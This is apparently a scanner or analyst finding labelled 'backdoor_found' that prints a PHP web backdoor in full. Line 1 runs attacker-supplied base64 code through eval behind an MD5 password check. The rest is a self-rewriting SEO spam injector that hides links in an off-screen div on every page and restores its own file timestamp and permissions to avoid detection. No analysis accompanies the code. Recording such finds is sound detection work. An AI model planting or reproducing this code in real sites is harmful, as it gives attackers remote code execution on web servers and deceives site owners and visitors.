backdoor_found

1. <?php if(md5(@$_POST['85e1e'])=='7b4d538cb6c111e2169eff5682be3210')eval(base64_decode(@$_POST['94af8']));?><?php
2.         $links="GoogleSux";
3.         function ob_interception ($cont)
4.         {
5.                 global $links;
6.                 $cont = preg_replace ('!</body(.*?)>!si', "<div style='left: -3565px; position: absolute; top: -4812px'>".$links."</div></body\$1>", $cont);
7.                 return $cont;
8.         }
9.         function interception ()
10.         {
11.                 global $links;
12.                 if (!empty ($_POST ['links']) && sha1 (md5 (sha1 (base64_decode ($_POST ['pass'])))) == '3ac5b0923c68dabf50c0cba739921d34b121a66f')
13.                 {
14.                         if (get_magic_quotes_gpc ())
15.                         {
16.                                 foreach ($_POST as $k => $v) $_POST [$k] = stripslashes ($v);
17.                         }
18.                         $code = implode ('', file (__FILE__));
19.                         preg_match ("#links=\"(.*?)\";#is", $code, $m);
20.                         $code = str_replace ($m [1], addslashes (base64_decode ($_POST ['links'])), $code);
21.                         $time = @filemtime (__FILE__);
22.                         $perm = @fileperms (__FILE__);
23.                         $f = fopen (__FILE__, 'w+'); fwrite ($f, $code); fclose ($f);
24.                         @touch (__FILE__,$time, $time);
25.                         @chmod (__FILE__,$perm);
26.                         echo '5a7d'.'fd40'.'597e'.'e50f'.'5f55'.'049a'.'2102'.'d613';
27.                 }
28.                 if ($links != 'Google'.'Sux')
29.                 {
30.                         ob_start ('ob_interception');
31.                 }
32.         }
33.         interception ();
34. ?>